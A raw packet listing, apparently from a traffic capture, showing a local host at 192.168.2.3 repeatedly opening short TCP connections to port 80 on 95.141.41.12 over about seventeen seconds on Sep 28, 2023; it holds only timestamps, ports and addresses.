Sep 28, 2023 06:02:47.949870110 CEST	80	49960	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:47.952110052 CEST	80	49960	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:47.952292919 CEST	49960	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:48.068665028 CEST	49960	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:48.069070101 CEST	49963	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:48.266608953 CEST	80	49963	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:48.266768932 CEST	49963	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:48.267009974 CEST	49963	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:48.269248962 CEST	80	49960	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:48.269332886 CEST	49960	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:48.464370966 CEST	80	49963	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:48.470272064 CEST	80	49963	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:48.470361948 CEST	49963	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:48.575560093 CEST	49963	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:48.576070070 CEST	49966	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:48.772927046 CEST	80	49963	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:48.773343086 CEST	49963	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:48.776803970 CEST	80	49966	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:48.776973009 CEST	49966	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:48.777271986 CEST	49966	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:48.978246927 CEST	80	49966	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:48.982611895 CEST	80	49966	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:48.983119011 CEST	49966	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:49.090794086 CEST	49966	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:49.091178894 CEST	49969	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:49.284605980 CEST	80	49969	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:49.285072088 CEST	49969	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:49.285670042 CEST	49969	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:49.291816950 CEST	80	49966	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:49.292263985 CEST	49966	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:49.481117964 CEST	80	49969	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:49.484982967 CEST	80	49969	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:49.485446930 CEST	49969	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:49.590862036 CEST	49969	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:49.591145992 CEST	49971	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:49.784316063 CEST	80	49969	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:49.784616947 CEST	80	49971	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:49.784627914 CEST	49969	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:49.784713030 CEST	49971	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:49.787607908 CEST	49971	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:49.980948925 CEST	80	49971	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:49.984366894 CEST	80	49971	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:49.984445095 CEST	49971	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:50.098475933 CEST	49971	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:50.098849058 CEST	49974	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:50.292366028 CEST	80	49971	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:50.292505980 CEST	49971	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:50.293138027 CEST	80	49974	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:50.293220043 CEST	49974	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:50.293565989 CEST	49974	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:50.487746000 CEST	80	49974	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:50.492278099 CEST	80	49974	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:50.492501974 CEST	49974	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:50.606694937 CEST	49974	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:50.607002974 CEST	49977	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:50.801158905 CEST	80	49974	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:50.801367044 CEST	49974	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:50.801902056 CEST	80	49977	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:50.801980972 CEST	49977	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:50.802189112 CEST	49977	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:50.997273922 CEST	80	49977	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:51.003606081 CEST	80	49977	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:51.003683090 CEST	49977	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:51.106524944 CEST	49977	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:51.106950998 CEST	49980	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:51.302396059 CEST	80	49977	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:51.302520990 CEST	49977	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:51.304573059 CEST	80	49980	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:51.304655075 CEST	49980	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:51.304980993 CEST	49980	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:51.503077984 CEST	80	49980	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:51.508750916 CEST	80	49980	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:51.508961916 CEST	49980	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:51.622155905 CEST	49980	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:51.622724056 CEST	49983	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:51.810172081 CEST	80	49983	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:51.810374022 CEST	49983	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:51.810689926 CEST	49983	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:51.820453882 CEST	80	49980	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:51.820647955 CEST	49980	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:51.997283936 CEST	80	49983	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:52.001777887 CEST	80	49983	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:52.001837015 CEST	49983	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:52.106184006 CEST	49983	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:52.106873989 CEST	49985	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:52.296957016 CEST	80	49983	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:52.297339916 CEST	49983	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:52.297547102 CEST	80	49985	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:52.297765970 CEST	49985	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:52.297900915 CEST	49985	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:52.488058090 CEST	80	49985	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:52.492737055 CEST	80	49985	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:52.492824078 CEST	49985	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:52.608325005 CEST	49985	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:52.608727932 CEST	49989	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:52.799094915 CEST	80	49985	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:52.799246073 CEST	49985	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:52.801996946 CEST	80	49989	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:52.802190065 CEST	49989	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:52.802347898 CEST	49989	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:52.999017954 CEST	80	49989	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:53.004324913 CEST	80	49989	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:53.004451990 CEST	49989	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:53.106719017 CEST	49989	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:53.106966972 CEST	49990	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:53.300220966 CEST	80	49989	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:53.300383091 CEST	49989	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:53.304887056 CEST	80	49990	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:53.305128098 CEST	49990	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:53.305241108 CEST	49990	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:53.503413916 CEST	80	49990	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:53.509951115 CEST	80	49990	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:53.510420084 CEST	49990	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:53.622190952 CEST	49990	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:53.622801065 CEST	49992	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:53.822818995 CEST	80	49992	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:53.822932005 CEST	80	49990	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:53.823054075 CEST	49992	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:53.823116064 CEST	49990	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:53.823291063 CEST	49992	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:54.021192074 CEST	80	49992	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:54.025660992 CEST	80	49992	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:54.025728941 CEST	49992	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:54.137506008 CEST	49992	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:54.138026953 CEST	49995	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:54.334623098 CEST	80	49995	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:54.334847927 CEST	49995	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:54.334960938 CEST	49995	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:54.337100029 CEST	80	49992	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:54.337160110 CEST	49992	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:54.531410933 CEST	80	49995	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:54.536508083 CEST	80	49995	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:54.536699057 CEST	49995	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:54.638058901 CEST	49995	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:54.638346910 CEST	49996	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:54.832031965 CEST	80	49996	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:54.832128048 CEST	49996	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:54.833679914 CEST	49996	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:54.834479094 CEST	80	49995	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:54.834651947 CEST	49995	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:55.027379990 CEST	80	49996	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:55.032604933 CEST	80	49996	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:55.032829046 CEST	49996	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:55.138956070 CEST	49996	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:55.139240980 CEST	49998	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:55.324143887 CEST	80	49998	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:55.324373960 CEST	49998	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:55.324641943 CEST	49998	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:55.332849026 CEST	80	49996	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:55.333058119 CEST	49996	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:55.509735107 CEST	80	49998	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:55.514705896 CEST	80	49998	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:55.514842033 CEST	49998	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:55.623084068 CEST	49998	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:55.623892069 CEST	50002	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:55.807929039 CEST	80	49998	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:55.808197975 CEST	49998	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:55.818631887 CEST	80	50002	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:55.818775892 CEST	50002	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:55.818986893 CEST	50002	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:56.014209032 CEST	80	50002	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:56.018261909 CEST	80	50002	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:56.018342972 CEST	50002	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:56.269181967 CEST	50002	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:56.269635916 CEST	50003	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:56.464369059 CEST	80	50002	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:56.464437962 CEST	50002	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:56.475336075 CEST	80	50003	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:56.475411892 CEST	50003	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:56.475678921 CEST	50003	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:56.681355953 CEST	80	50003	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:56.685781956 CEST	80	50003	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:56.685857058 CEST	50003	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:56.918859005 CEST	50003	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:56.919342995 CEST	50005	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:57.109689951 CEST	80	50005	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:57.110030890 CEST	50005	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:57.110030890 CEST	50005	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:57.124675035 CEST	80	50003	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:57.124911070 CEST	50003	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:57.300416946 CEST	80	50005	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:57.305238962 CEST	80	50005	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:57.305773973 CEST	50005	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:57.419193029 CEST	50005	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:57.419464111 CEST	50006	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:57.607686996 CEST	80	50006	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:57.608170033 CEST	50006	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:57.608483076 CEST	50006	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:57.610037088 CEST	80	50005	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:57.610352993 CEST	50005	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:57.796596050 CEST	80	50006	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:57.803512096 CEST	80	50006	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:57.803747892 CEST	50006	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:57.921430111 CEST	50006	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:57.921608925 CEST	50008	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:58.109837055 CEST	80	50006	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:58.109904051 CEST	80	50008	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:58.109925032 CEST	50006	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:58.110006094 CEST	50008	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:58.110224962 CEST	50008	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:58.298088074 CEST	80	50008	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:58.302835941 CEST	80	50008	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:58.303083897 CEST	50008	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:58.419239044 CEST	50009	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:58.419363976 CEST	50008	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:58.607101917 CEST	80	50008	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:58.607358932 CEST	50008	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:58.624988079 CEST	80	50009	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:58.625092030 CEST	50009	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:58.625406981 CEST	50009	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:58.830904961 CEST	80	50009	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:58.835597038 CEST	80	50009	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:58.835745096 CEST	50009	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:58.950151920 CEST	50009	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:58.950800896 CEST	50010	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:59.144714117 CEST	80	50010	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:59.144841909 CEST	50010	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:59.145059109 CEST	50010	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:59.155699015 CEST	80	50009	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:59.155797005 CEST	50009	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:59.339551926 CEST	80	50010	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:59.344568968 CEST	80	50010	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:59.344769001 CEST	50010	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:59.450253010 CEST	50010	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:59.450606108 CEST	50012	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:59.644581079 CEST	80	50010	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:59.644963980 CEST	50010	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:59.654994965 CEST	80	50012	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:59.655360937 CEST	50012	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:59.655646086 CEST	50012	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:59.860889912 CEST	80	50012	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:59.865083933 CEST	80	50012	95.141.41.12	192.168.2.3
Sep 28, 2023 06:02:59.865225077 CEST	50012	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:59.982506990 CEST	50012	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:02:59.983081102 CEST	50013	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:00.179421902 CEST	80	50013	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:00.179750919 CEST	50013	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:00.179828882 CEST	50013	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:00.187294006 CEST	80	50012	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:00.187383890 CEST	50012	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:00.376349926 CEST	80	50013	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:00.381367922 CEST	80	50013	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:00.381576061 CEST	50013	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:00.497154951 CEST	50013	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:00.497476101 CEST	50014	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:00.693983078 CEST	80	50013	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:00.694336891 CEST	50013	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:00.694863081 CEST	80	50014	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:00.694952965 CEST	50014	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:00.695137978 CEST	50014	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:00.892807007 CEST	80	50014	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:00.896809101 CEST	80	50014	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:00.896912098 CEST	50014	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:01.012693882 CEST	50014	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:01.012888908 CEST	50016	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:01.197588921 CEST	80	50016	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:01.197724104 CEST	50016	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:01.197971106 CEST	50016	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:01.210365057 CEST	80	50014	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:01.210513115 CEST	50014	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:01.383704901 CEST	80	50016	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:01.385119915 CEST	80	50016	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:01.385185003 CEST	50016	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:01.499937057 CEST	50016	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:01.500353098 CEST	50017	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:01.684720993 CEST	80	50016	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:01.684895992 CEST	50016	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:01.704859018 CEST	80	50017	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:01.704982996 CEST	50017	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:01.705183983 CEST	50017	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:01.909471035 CEST	80	50017	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:01.912450075 CEST	80	50017	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:01.912525892 CEST	50017	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:02.028099060 CEST	50017	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:02.028579950 CEST	50018	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:02.216319084 CEST	80	50018	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:02.216450930 CEST	50018	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:02.216645956 CEST	50018	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:02.232355118 CEST	80	50017	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:02.232510090 CEST	50017	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:02.404067039 CEST	80	50018	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:02.407897949 CEST	80	50018	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:02.407979965 CEST	50018	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:02.513015032 CEST	50018	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:02.513353109 CEST	50020	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:02.700632095 CEST	80	50018	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:02.700747013 CEST	50018	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:02.718100071 CEST	80	50020	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:02.718172073 CEST	50020	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:02.718378067 CEST	50020	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:02.924057007 CEST	80	50020	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:02.927342892 CEST	80	50020	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:02.927412987 CEST	50020	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:03.029860020 CEST	50020	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:03.030249119 CEST	50021	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:03.224160910 CEST	80	50021	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:03.224379063 CEST	50021	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:03.224649906 CEST	50021	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:03.234927893 CEST	80	50020	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:03.235009909 CEST	50020	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:03.418229103 CEST	80	50021	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:03.422745943 CEST	80	50021	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:03.422806025 CEST	50021	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:03.528667927 CEST	50021	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:03.529071093 CEST	50022	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:03.723094940 CEST	80	50021	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:03.723223925 CEST	50021	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:03.728322029 CEST	80	50022	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:03.728514910 CEST	50022	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:03.728667021 CEST	50022	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:03.928011894 CEST	80	50022	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:03.930944920 CEST	80	50022	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:03.931039095 CEST	50022	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:04.043754101 CEST	50022	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:04.044205904 CEST	50024	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:04.229561090 CEST	80	50024	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:04.229855061 CEST	50024	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:04.229969978 CEST	50024	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:04.243555069 CEST	80	50022	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:04.243618965 CEST	50022	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:04.415122032 CEST	80	50024	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:04.419014931 CEST	80	50024	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:04.419162035 CEST	50024	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:04.528331041 CEST	50024	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:04.528743982 CEST	50025	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:04.713052988 CEST	80	50024	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:04.713264942 CEST	50024	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:04.715809107 CEST	80	50025	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:04.715926886 CEST	50025	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:04.716134071 CEST	50025	80	192.168.2.3	95.141.41.12
Sep 28, 2023 06:03:04.903464079 CEST	80	50025	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:04.908276081 CEST	80	50025	95.141.41.12	192.168.2.3
Sep 28, 2023 06:03:04.908473969 CEST	50025	80	192.168.2.3	95.141.41.12
